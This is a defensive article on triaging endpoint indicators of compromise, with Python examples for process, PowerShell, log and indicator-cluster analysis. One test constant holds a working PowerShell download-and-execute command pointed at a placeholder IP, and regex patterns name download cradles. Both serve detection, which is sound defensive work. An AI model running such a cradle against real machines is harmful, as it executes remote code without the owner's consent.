An indicator of compromise sounds like a definitive thing — a red flag, a smoking gun, proof. In practice, it's more like a thread you pull on. A single IoC rarely tells you much. It's the combination of signals, their timing, and their relationship to each other that builds an actual picture of what happened.
Here's how to think about endpoint artifacts without jumping to conclusions — and without dismissing things that deserve attention.
What an IoC Actually Is
Functionally, an IoC is any observable artifact that suggests malicious activity may have occurred. The operative word is "may." A process running from a temp directory is suspicious. A process running from a temp directory, establishing an outbound connection to an unknown IP, with a name that resembles a legitimate system binary — that's a coherent story.
IoCs are input to analysis, not the conclusion of it. The analyst's job is to determine whether the observed artifacts are consistent with a malicious campaign or have a benign explanation.
Categories of Endpoint Evidence
Anomalous Processes
Look for processes that don't belong — names that mimic legitimate Windows components with slight variations, processes running from unusual locations (%APPDATA%, %TEMP%, user profile subdirectories), or processes with no visible window and no parent process that makes sense.
Parent-child relationships matter enormously. Microsoft Word spawning PowerShell is a classic malicious pattern. Explorer.exe spawning cmd.exe is common and usually benign. Context is everything.
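As an added example (not code from the original article), here is the location, naming and parent-child triage just described, run over constructed process-creation records in the shape of Sysmon Event ID 1 fields. The binary lists, the Office-to-shell pairing and the 0.85 name-similarity cutoff are assumptions to tune for your environment; they are not part of the article.

```python
# Added example: triage of process-creation records for the anomalies the
# article lists. Record shape, binary lists and thresholds are assumptions.
from difflib import SequenceMatcher

SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe",
                   "services.exe", "winlogon.exe", "rundll32.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")

# Document handlers have no business spawning a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe"}


def mimics_system_binary(name):
    """True for near-misses of real system binary names (svch0st.exe, lsasss.exe),
    False for the genuine names themselves and for unrelated names."""
    name = name.lower()
    if name in SYSTEM_BINARIES:
        return False
    return any(SequenceMatcher(None, name, real).ratio() >= 0.85 for real in SYSTEM_BINARIES)


def check_process(event):
    """Return the reasons one process-creation record looks suspicious (empty = none)."""
    image = event["image"].lower()
    directory, _, name = image.rpartition("\\")
    directory += "\\"
    parent = event["parent_image"].lower().rpartition("\\")[2]
    reasons = []
    if any(d in directory for d in USER_WRITABLE):
        reasons.append(f"runs from user-writable path {directory}")
    if name in SYSTEM_BINARIES and not directory.startswith(SYSTEM_DIRS):
        reasons.append(f"{name} running outside a system directory")
    if mimics_system_binary(name):
        reasons.append(f"{name} mimics a system binary name")
    if parent in OFFICE_PARENTS and name in SHELLS:
        reasons.append(f"{parent} spawned {name}")
    return reasons


def flag_processes(events):
    """Map each flagged image path to its reasons; clean records are dropped."""
    flagged = {}
    for ev in events:
        reasons = check_process(ev)
        if reasons:
            flagged[ev["image"]] = reasons
    return flagged


# Constructed sample records: one benign Explorer-to-cmd chain, one
# Word-to-PowerShell chain, one look-alike binary dropped in %TEMP%.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\svch0st.exe",
     "parent_image": r"C:\Users\alice\Downloads\invoice.exe"},
]

if __name__ == "__main__":
    for image, reasons in flag_processes(SAMPLE_EVENTS).items():
        print(image, "->", "; ".join(reasons))
```

The similarity check is deliberately loose: it exists to surface candidates for a human, not to convict. The Office-to-shell rule is the one worth alerting on directly, because the benign rate is close to zero.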
Persistence Mechanisms
Malware that wants to survive a reboot needs to write itself into the startup sequence. Common locations include registry run keys, the startup folder, scheduled tasks, and service installations. Finding a scheduled task created at 2:17 AM that runs a base64-encoded PowerShell command is not something that requires much debate.
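The scheduled task in that sentence is worth showing end to end. The following is an added example, not code from the article: it decodes the -EncodedCommand payload from a task action or Run-key command line (PowerShell expects base64 of UTF-16LE text) and lists the tradecraft visible in it. The sample task action is constructed here from a known script so the blob is genuine; the switch handling and pattern lists are assumptions to extend.

```python
# Added example: decode and assess an encoded PowerShell command line found in
# a persistence location. Pattern lists are assumptions, not the article's.
import base64
import re

CMDLINE_PATTERNS = {
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(rofile)?\b", re.I),
    "execution policy bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
}
SCRIPT_PATTERNS = {
    "download cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\biwr\b", re.I),
    "dynamic execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}


def is_encoded_switch(token):
    """-EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc, ...)."""
    if not token or token[0] not in "-/":
        return False
    t = token[1:].lower()
    return t == "ec" or (t != "" and "encodedcommand".startswith(t))


def decode_encoded_command(cmdline):
    """Return the script behind an -EncodedCommand argument, or None if there is
    none or the blob is not valid base64 of UTF-16LE text."""
    tokens = cmdline.split()
    for switch, blob in zip(tokens, tokens[1:]):
        if not is_encoded_switch(switch):
            continue
        blob = blob.strip("'\"")
        blob += "=" * (-len(blob) % 4)        # tolerate stripped padding
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:                    # binascii.Error and UnicodeDecodeError both subclass it
            return None
    return None


def assess_powershell(cmdline):
    """Decode the command line and list the techniques visible in it."""
    script = decode_encoded_command(cmdline)
    flags = ["encoded command"] if script is not None else []
    flags += [name for name, pat in CMDLINE_PATTERNS.items() if pat.search(cmdline)]
    body = script if script is not None else cmdline     # un-encoded -Command lines get the same checks
    flags += [name for name, pat in SCRIPT_PATTERNS.items() if pat.search(body)]
    return {"script": script, "flags": flags}


def encode_for_powershell(script):
    """Produce the blob PowerShell expects: UTF-16LE text, base64-encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a download cradle pulling from a documentation-range address.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_TASK_ACTION = "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    verdict = assess_powershell(SAMPLE_TASK_ACTION)
    print(verdict["script"])
    print(", ".join(verdict["flags"]))
```

Decoding is the cheap step that turns "encoded PowerShell, medium confidence" into something you can actually read; the flags are what you carry into the wider cluster of indicators.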
Suspicious Files
Newly created executables in user-writable directories, files with misleading names or extensions (an .exe dressed up to look like a .pdf, a document that carries macros), or a large batch of files sharing a single creation timestamp are all worth noting.
Configuration Changes
Disabled Windows Defender, modified hosts file entries, changed DNS settings, disabled UAC: these are subversions of security controls. None of them proves malicious activity on its own, but an endpoint with all four active simultaneously is not a coincidence.
Relevant Log Entries
Event logs are noisy, but certain Security log event IDs deserve immediate attention: account creation outside normal provisioning (4720), privilege escalation such as a member added to a privileged local group (4732), a cleared security log (1102; the act of clearing the log is itself logged, along with the account that did it), and a run of authentication failures (4625) followed immediately by a success (4624).
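Two of those patterns, as an added example that is not code from the article: a burst of failed logons followed by a success for the same account from the same source, and the events that are themselves the artifact (log clearing, account creation, privileged group changes). The records are constructed with the event IDs named above; the five-minute window, three-failure threshold and simplified field names are assumptions.

```python
# Added example: two Security-log checks over constructed event records.
# Window, threshold and the flattened field names are assumptions.
from collections import defaultdict
from datetime import datetime, timedelta

LOGON_FAILED, LOGON_OK, ACCOUNT_CREATED, LOCAL_GROUP_ADD, LOG_CLEARED = 4625, 4624, 4720, 4732, 1102


def ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def failed_then_success(events, window=timedelta(minutes=5), min_failures=3):
    """Successful logons preceded, within the window, by a burst of failures for
    the same account from the same source: password guessing that worked."""
    failures = defaultdict(list)
    hits = []
    for ev in sorted(events, key=ts):
        if ev["id"] not in (LOGON_FAILED, LOGON_OK):
            continue
        key = (ev["user"].lower(), ev.get("src_ip"))
        if ev["id"] == LOGON_FAILED:
            failures[key].append(ts(ev))
            continue
        recent = [t for t in failures[key] if ts(ev) - t <= window]
        if len(recent) >= min_failures:
            hits.append({"user": key[0], "src_ip": key[1],
                         "failures": len(recent), "success_at": ev["time"]})
        failures[key].clear()      # a success resets the burst for that key
    return hits


def control_events(events):
    """Events that are the artifact in themselves, each logged with the account
    that performed the action: (time, label, actor, target)."""
    labels = {LOG_CLEARED: "security log cleared",
              ACCOUNT_CREATED: "account created",
              LOCAL_GROUP_ADD: "member added to local group"}
    return [(ev["time"], labels[ev["id"]], ev["user"], ev.get("target"))
            for ev in sorted(events, key=ts) if ev["id"] in labels]


# Constructed sample: four failures then a success for a service account at
# 02:11, a new account placed in Administrators six minutes later, the
# Security log cleared at 02:40, and an ordinary morning logon as a control.
SAMPLE_EVENTS = [
    {"time": "2024-03-02 02:11:04", "id": 4625, "user": "svc_backup", "src_ip": "10.0.0.45"},
    {"time": "2024-03-02 02:11:09", "id": 4625, "user": "svc_backup", "src_ip": "10.0.0.45"},
    {"time": "2024-03-02 02:11:15", "id": 4625, "user": "svc_backup", "src_ip": "10.0.0.45"},
    {"time": "2024-03-02 02:11:22", "id": 4625, "user": "svc_backup", "src_ip": "10.0.0.45"},
    {"time": "2024-03-02 02:11:31", "id": 4624, "user": "svc_backup", "src_ip": "10.0.0.45"},
    {"time": "2024-03-02 02:17:09", "id": 4720, "user": "svc_backup", "target": "support2"},
    {"time": "2024-03-02 02:17:12", "id": 4732, "user": "svc_backup", "target": "Administrators"},
    {"time": "2024-03-02 02:40:55", "id": 1102, "user": "svc_backup"},
    {"time": "2024-03-02 08:03:10", "id": 4624, "user": "alice", "src_ip": "10.0.0.12"},
]

if __name__ == "__main__":
    for hit in failed_then_success(SAMPLE_EVENTS):
        print("guessed-in:", hit)
    for row in control_events(SAMPLE_EVENTS):
        print("control event:", row)
```

Note what the sample shows on its own timeline: the same account that got in after a failure burst then creates an account, escalates it and clears the log. That sequence, not any single event, is the finding.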
| Indicator | Possible Interpretation | Confidence Level |
|---|---|---|
| Process running from %TEMP% | Packed/dropped executable | Medium |
| PowerShell with encoded command | Script obfuscation | High |
| Registry Run key pointing to unknown binary | Persistence mechanism | High |
| Outbound traffic to unknown IP on port 443 | C2 communication | Medium |
| VSS deletion via legitimate admin tool | Pre-ransomware preparation | High |
| Large number of files renamed simultaneously | Active encryption | Very High |
| Security log cleared | Active attacker covering tracks | High |
| New local admin account created | Privilege persistence | High |
The Problem With Isolated Indicators
A base64-encoded PowerShell command by itself is not proof of compromise. Administrators and management agents run encoded PowerShell for legitimate reasons, often just to sidestep quoting problems. A single unusual process could be a poorly written installer. One network connection to an unfamiliar IP might be an analytics SDK phoning home.
The threshold for declaring an incident should be based on the cluster of indicators, not any single artifact. The methodology: when you find one suspicious signal, ask what other signals would be present if it were malicious — then go look for them. If you find two or three supporting indicators, the picture shifts considerably.
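That methodology can be written down. As an added example (not code from the article), the block below scores each host on the distinct indicators seen within a time window, so that one signal scores low and a cluster scores high, and for every signal present it lists the corroborating artifacts still unobserved: the "go look for them" step. Indicator names, the weights (roughly following the confidence column of the table above), the corroboration map and the two-hour window are assumptions to tune.

```python
# Added example: per-host clustering of indicators inside a time window plus
# the list of corroborating signals to check next. Names, weights, the
# corroboration map and the window are assumptions, not the article's.
from collections import defaultdict
from datetime import datetime, timedelta

WEIGHTS = {
    "temp_process": 2, "encoded_powershell": 3, "run_key_unknown": 3,
    "unknown_443": 2, "vss_deleted": 3, "mass_rename": 4,
    "log_cleared": 3, "new_local_admin": 3,
}

# If this signal is malicious, what else should be present on the box?
CORROBORATING = {
    "encoded_powershell": ["temp_process", "unknown_443", "run_key_unknown"],
    "temp_process": ["run_key_unknown", "unknown_443", "encoded_powershell"],
    "unknown_443": ["temp_process", "encoded_powershell", "run_key_unknown"],
    "run_key_unknown": ["temp_process", "unknown_443"],
    "vss_deleted": ["mass_rename", "log_cleared", "new_local_admin"],
    "new_local_admin": ["log_cleared", "run_key_unknown", "unknown_443"],
    "log_cleared": ["new_local_admin", "vss_deleted", "run_key_unknown"],
    "mass_rename": ["vss_deleted"],
}


def next_checks(indicator, already_seen=()):
    """Corroborating indicators not yet observed: the analyst's to-do list."""
    return [c for c in CORROBORATING.get(indicator, []) if c not in already_seen]


def score_host(observations, window=timedelta(hours=2)):
    """Best (score, indicators) over any window on one host. Repeats of an
    indicator count once; signals far apart in time do not add up."""
    obs = sorted(observations)
    best_score, best_kinds = 0, []
    for i, (start, _) in enumerate(obs):
        kinds = {}
        for t, kind in obs[i:]:
            if t - start > window:
                break
            kinds[kind] = WEIGHTS[kind]
        if sum(kinds.values()) > best_score:
            best_score, best_kinds = sum(kinds.values()), sorted(kinds)
    return best_score, best_kinds


def triage(events, threshold=6):
    """events: (host, ISO timestamp, indicator). Returns a verdict per host."""
    by_host = defaultdict(list)
    for host, when, kind in events:
        by_host[host].append((datetime.fromisoformat(when), kind))
    verdicts = {}
    for host, obs in by_host.items():
        score, kinds = score_host(obs)
        verdicts[host] = {
            "score": score, "indicators": kinds, "escalate": score >= threshold,
            "look_for": sorted({c for k in kinds for c in next_checks(k, kinds)}),
        }
    return verdicts


# Constructed sample: a tight intrusion chain on WS-042, an admin's encoded
# script and an unrelated installer hours apart on WS-017, ransomware staging on FS-01.
SAMPLE = [
    ("WS-042", "2024-03-02T02:17:00", "encoded_powershell"),
    ("WS-042", "2024-03-02T02:18:30", "temp_process"),
    ("WS-042", "2024-03-02T02:19:10", "unknown_443"),
    ("WS-017", "2024-03-02T09:00:00", "encoded_powershell"),
    ("WS-017", "2024-03-02T15:30:00", "temp_process"),
    ("FS-01", "2024-03-02T03:00:00", "vss_deleted"),
    ("FS-01", "2024-03-02T03:05:00", "mass_rename"),
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE).items():
        print(host, verdict)
```

WS-017 carries the same two indicator types as WS-042 but six hours apart, and scores like a single artifact; that is the point of the window. The threshold is a starting point for a triage queue, not a verdict, and hosts in the high-stakes category discussed below should be escalated regardless of score.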
Limitations You Should Acknowledge
Surface-level analysis has real limits. A sophisticated piece of malware may leave no obvious process artifacts if it injects into a legitimate process. It may use encrypted traffic over common ports that looks like normal HTTPS. The absence of obvious IoCs does not clear a machine — it might just mean you need deeper analysis than a checklist provides.
When the indicators are ambiguous and the stakes are high (executive machine, domain controller, server with access to sensitive data), the answer is escalation or full forensic acquisition — not a judgment call made on incomplete information.
The goal of initial IoC analysis is to make an informed, defensible decision about next steps. That's it. Confirming or ruling out a full compromise is a different level of work.